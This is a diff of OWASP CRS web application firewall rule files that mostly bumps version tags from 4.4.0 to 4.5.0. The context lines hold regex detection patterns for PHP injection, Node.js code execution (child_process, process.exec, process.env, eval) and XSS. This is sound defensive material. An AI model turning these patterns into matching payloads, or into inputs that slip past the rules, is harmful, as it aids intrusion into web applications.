-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:932017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:932018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:932017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:932018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
 SecMarker "END-REQUEST-932-APPLICATION-ATTACK-RCE"
diff --git a/rules/@owasp_crs/REQUEST-933-APPLICATION-ATTACK-PHP.conf b/rules/@owasp_crs/REQUEST-933-APPLICATION-ATTACK-PHP.conf
index 8c19ec1..67729af 100644
--- a/rules/@owasp_crs/REQUEST-933-APPLICATION-ATTACK-PHP.conf
+++ b/rules/@owasp_crs/REQUEST-933-APPLICATION-ATTACK-PHP.conf
@@ -1,5 +1,5 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.4.0
+# OWASP CRS ver.4.5.0
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 # Copyright (c) 2021-2024 CRS project. All rights reserved.
 #
@@ -7,8 +7,8 @@
 # Apache Software License (ASL) version 2
 # Please see the enclosed LICENSE file for full details.
 # ------------------------------------------------------------------------
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:933011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:933012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:933011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:933012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
 SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)<\?(?:[^x]|x(?:[^m]|m(?:[^l]|l(?:[^\s\x0b]|[\s\x0b]+[^a-z]|$)))|$|php)|\[[/\x5c]?php\]" \
 "id:933100,\
 phase:2,\
@@ -24,7 +24,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -43,7 +43,7 @@ SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEAD
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -62,7 +62,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.933120_matched_var=%{MATCHED_VAR}',\
 setvar:'tx.933120_matched_var_name=%{MATCHED_VAR_NAME}',\
@@ -88,7 +88,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -107,7 +107,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -125,7 +125,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -144,7 +144,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -163,7 +163,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -182,7 +182,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -201,7 +201,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -220,12 +220,12 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:933013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:933014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:933013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:933014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
 SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@pmFromFile php-function-names-933151.data" \
 "id:933151,\
 phase:2,\
@@ -241,7 +241,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
 tag:'paranoia-level/2',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.933151_matched_var=%{MATCHED_VAR}',\
 setvar:'tx.933151_matched_var_name=%{MATCHED_VAR_NAME}',\
@@ -252,8 +252,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
 SecRule TX:1 "@pmFromFile php-function-names-933151.data" \
 "setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:933015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:933016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:933015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:933016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
 SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx AUTH_TYPE|HTTP_(?:ACCEPT(?:_(?:CHARSET|ENCODING|LANGUAGE))?|CONNECTION|(?:HOS|USER_AGEN)T|KEEP_ALIVE|(?:REFERE|X_FORWARDED_FO)R)|ORIG_PATH_INFO|PATH_(?:INFO|TRANSLATED)|QUERY_STRING|REQUEST_URI" \
 "id:933131,\
 phase:2,\
@@ -269,7 +269,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'paranoia-level/3',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -288,7 +288,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
 tag:'paranoia-level/3',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -307,7 +307,7 @@ SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEAD
 tag:'paranoia-level/3',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -326,7 +326,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'paranoia-level/3',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -345,10 +345,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
 tag:'paranoia-level/3',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:933017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:933018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:933017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:933018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
 SecMarker "END-REQUEST-933-APPLICATION-ATTACK-PHP"
diff --git a/rules/@owasp_crs/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf b/rules/@owasp_crs/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf
index e8d2737..bbcae5b 100644
--- a/rules/@owasp_crs/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf
+++ b/rules/@owasp_crs/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf
@@ -1,5 +1,5 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.4.0
+# OWASP CRS ver.4.5.0
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 # Copyright (c) 2021-2024 CRS project. All rights reserved.
 #
@@ -7,8 +7,8 @@ # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:934011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:934012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:934011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:934012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx _(?:\$\$ND_FUNC\$\$_|_js_function)|(?:\beval|new[\s\x0b]+Function[\s\x0b]*)\(|String\.fromCharCode|function\(\)\{|this\.constructor|module\.exports=|\([\s\x0b]*[^0-9A-Z_a-z]child_process[^0-9A-Z_a-z][\s\x0b]*\)|process(?:\.(?:(?:a(?:ccess|ppendfile|rgv|vailability)|c(?:aveats|h(?:mod|own)|(?:los|opyfil)e|p|reate(?:read|write)stream)|ex(?:ec(?:file)?|ists)|f(?:ch(?:mod|own)|data(?:sync)?|s(?:tat|ync)|utimes)|inodes|l(?:chmod|ink|stat|utimes)|mkd(?:ir|temp)|open(?:dir)?|r(?:e(?:ad(?:dir|file|link|v)?|name)|m)|s(?:pawn(?:file)?|tat|ymlink)|truncate|u(?:n(?:link|watchfile)|times)|w(?:atchfile|rite(?:file|v)?))(?:sync)?(?:\.call)?\(|binding|constructor|env|global|main(?:Module)?|process|require)|\[[\"'`](?:(?:a(?:ccess|ppendfile|rgv|vailability)|c(?:aveats|h(?:mod|own)|(?:los|opyfil)e|p|reate(?:read|write)stream)|ex(?:ec(?:file)?|ists)|f(?:ch(?:mod|own)|data(?:sync)?|s(?:tat|ync)|utimes)|inodes|l(?:chmod|ink|stat|utimes)|mkd(?:ir|temp)|open(?:dir)?|r(?:e(?:ad(?:dir|file|link|v)?|name)|m)|s(?:pawn(?:file)?|tat|ymlink
)|truncate|u(?:n(?:link|watchfile)|times)|w(?:atchfile|rite(?:file|v)?))(?:sync)?|binding|constructor|env|global|main(?:Module)?|process|require)[\"'`]\])|(?:binding|constructor|env|global|main(?:Module)?|process|require)\[|console(?:\.(?:debug|error|info|trace|warn)(?:\.call)?\(|\[[\"'`](?:debug|error|info|trace|warn)[\"'`]\])|require(?:\.(?:resolve(?:\.call)?\(|main|extensions|cache)|\[[\"'`](?:(?:resolv|cach)e|main|extensions)[\"'`]\])" \ "id:934100,\ phase:2,\ @@ -25,7 +25,7 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIE tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ multiMatch,\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ @@ -45,7 +45,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/664',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -65,7 +65,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1/180/77',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ multiMatch,\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ @@ -86,7 +86,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" 
@@ -106,7 +106,7 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIE
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 multiMatch,\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
@@ -126,12 +126,12 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIE
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:934013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:934014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:934013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:934014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC"
 SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:close|exists|fork|(?:ope|spaw)n|re(?:ad|quire)|w(?:atch|rite))[\s\x0b]*\(" \
 "id:934101,\
 phase:2,\
@@ -148,7 +148,7 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIE
 tag:'paranoia-level/2',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 multiMatch,\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
@@ -168,7 +168,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
 tag:'paranoia-level/2',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/225/664',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -188,12 +188,12 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'paranoia-level/2',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:934015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:934016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:934017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:934018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:934015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:934016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:934017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:934018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC"
 SecMarker "END-REQUEST-934-APPLICATION-ATTACK-GENERIC"
diff --git a/rules/@owasp_crs/REQUEST-941-APPLICATION-ATTACK-XSS.conf b/rules/@owasp_crs/REQUEST-941-APPLICATION-ATTACK-XSS.conf
index 17cb32f..2c70f67 100644
--- a/rules/@owasp_crs/REQUEST-941-APPLICATION-ATTACK-XSS.conf
+++ b/rules/@owasp_crs/REQUEST-941-APPLICATION-ATTACK-XSS.conf
@@ -1,5 +1,5 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.4.0
+# OWASP CRS ver.4.5.0
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 # Copyright (c) 2021-2024 CRS project. All rights reserved.
 #
@@ -7,8 +7,8 @@
 # Apache Software License (ASL) version 2
 # Please see the enclosed LICENSE file for full details.
 # ------------------------------------------------------------------------
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:941011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:941012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:941011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:941012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS"
 SecRule REQUEST_FILENAME "!@validateByteRange 20, 45-47, 48-57, 65-90, 95, 97-122" \
 "id:941010,\
 phase:1,\
@@ -17,7 +17,7 @@ SecRule REQUEST_FILENAME "!@validateByteRange 20, 45-47, 48-57, 65-90, 95, 97-12
 nolog,\
 tag:'OWASP_CRS',\
 ctl:ruleRemoveTargetByTag=xss-perf-disable;REQUEST_FILENAME,\
- ver:'OWASP_CRS/4.4.0'"
+ ver:'OWASP_CRS/4.5.0'"
 SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|XML:/* "@detectXSS" \
 "id:941100,\
 phase:2,\
